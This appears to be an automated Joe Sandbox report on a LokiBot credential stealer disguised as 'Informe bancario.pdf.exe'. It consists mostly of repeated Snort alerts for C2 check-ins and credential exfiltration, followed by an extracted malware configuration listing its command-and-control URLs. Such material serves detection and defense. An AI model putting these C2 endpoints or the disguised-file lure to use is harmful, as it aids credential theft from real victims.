Timestamp:	192.168.2.3172.67.154.7249768802021641 06/23/22-17:54:59.413778
SID:	2021641
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249852802024318 06/23/22-17:55:55.592533
SID:	2024318
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249873802025381 06/23/22-17:56:04.198158
SID:	2025381
Source Port:	49873
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349745802021641 06/23/22-17:54:39.886492
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349774802024313 06/23/22-17:55:10.726793
SID:	2024313
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349776802025381 06/23/22-17:55:13.438859
SID:	2025381
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349774802024318 06/23/22-17:55:10.726793
SID:	2024318
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249831802025381 06/23/22-17:55:33.546351
SID:	2025381
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349836802025381 06/23/22-17:55:40.617404
SID:	2025381
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249742802025381 06/23/22-17:54:35.573404
SID:	2025381
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249769802024313 06/23/22-17:55:00.833023
SID:	2024313
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349780802021641 06/23/22-17:55:16.534873
SID:	2021641
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249852802024313 06/23/22-17:55:55.592533
SID:	2024313
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349881802024313 06/23/22-17:56:16.928509
SID:	2024313
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249769802024318 06/23/22-17:55:00.833023
SID:	2024318
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249757802021641 06/23/22-17:54:50.135454
SID:	2021641
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349792802024313 06/23/22-17:55:18.935502
SID:	2024313
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349765802025381 06/23/22-17:54:54.716737
SID:	2025381
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249882802024318 06/23/22-17:56:19.809048
SID:	2024318
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349813802025381 06/23/22-17:55:22.328153
SID:	2025381
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349813802021641 06/23/22-17:55:22.328153
SID:	2021641
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249772802024318 06/23/22-17:55:07.425069
SID:	2024318
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349774802025381 06/23/22-17:55:10.726793
SID:	2025381
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349776802021641 06/23/22-17:55:13.438859
SID:	2021641
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249873802021641 06/23/22-17:56:04.198158
SID:	2021641
Source Port:	49873
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249816802025381 06/23/22-17:55:26.329557
SID:	2025381
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249882802021641 06/23/22-17:56:19.809048
SID:	2021641
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349865802021641 06/23/22-17:56:00.557524
SID:	2021641
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349883802024318 06/23/22-17:56:20.757705
SID:	2024318
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349883802024313 06/23/22-17:56:20.757705
SID:	2024313
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249844802025381 06/23/22-17:55:50.553165
SID:	2025381
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249747802024313 06/23/22-17:54:44.305987
SID:	2024313
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249749802025381 06/23/22-17:54:47.375834
SID:	2025381
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249845802021641 06/23/22-17:55:53.427872
SID:	2021641
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249746802025381 06/23/22-17:54:42.346945
SID:	2025381
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249741802021641 06/23/22-17:54:33.910153
SID:	2021641
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249744802024318 06/23/22-17:54:38.472164
SID:	2024318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249859802025381 06/23/22-17:55:58.152468
SID:	2025381
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349835802025381 06/23/22-17:55:36.607918
SID:	2025381
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249744802024313 06/23/22-17:54:38.472164
SID:	2024313
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249747802024318 06/23/22-17:54:44.305987
SID:	2024318
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349803802024313 06/23/22-17:55:20.890777
SID:	2024313
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249852802025381 06/23/22-17:55:55.592533
SID:	2025381
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349766802024318 06/23/22-17:54:56.372364
SID:	2024318
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249831802024313 06/23/22-17:55:33.546351
SID:	2024313
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249771802021641 06/23/22-17:55:04.009923
SID:	2021641
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349803802024318 06/23/22-17:55:20.890777
SID:	2024318
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249831802024318 06/23/22-17:55:33.546351
SID:	2024318
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249757802025381 06/23/22-17:54:50.135454
SID:	2025381
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249742802024317 06/23/22-17:54:35.573404
SID:	2024317
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249742802024312 06/23/22-17:54:35.573404
SID:	2024312
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349766802024313 06/23/22-17:54:56.372364
SID:	2024313
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249768802025381 06/23/22-17:54:59.413778
SID:	2025381
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349872802024313 06/23/22-17:56:02.086134
SID:	2024313
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349843802021641 06/23/22-17:55:45.763232
SID:	2021641
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349765802021641 06/23/22-17:54:54.716737
SID:	2021641
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349837802021641 06/23/22-17:55:42.276335
SID:	2021641
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349872802024318 06/23/22-17:56:02.086134
SID:	2024318
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249772802024313 06/23/22-17:55:07.425069
SID:	2024313
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349780802025381 06/23/22-17:55:16.534873
SID:	2025381
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Informe bancario.pdf.exe

Virustotal: Detection: 29%

Perma Link

Multi AV Scanner detection for domain / URL

Source: kossa.xyz

Virustotal: Detection: 9%

Perma Link

Machine Learning detection for sample

Source: Informe bancario.pdf.exe

Joe Sandbox ML: detected

Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://kossa.xyz/esi/pp/play.php"]}

Source: Informe bancario.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Informe bancario.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe

Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49741 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49741 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49741 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49741 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49742 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49745 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49757 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49762 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49765 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49766 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49767 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49767 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49767 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49767 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49768 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49768 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49768 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49768 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49769 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49770 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49771 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49771 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49771 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49771 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49772 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49772 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49772 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49772 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49773 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49774 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49774 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49774 -> 104.21.40.153:80
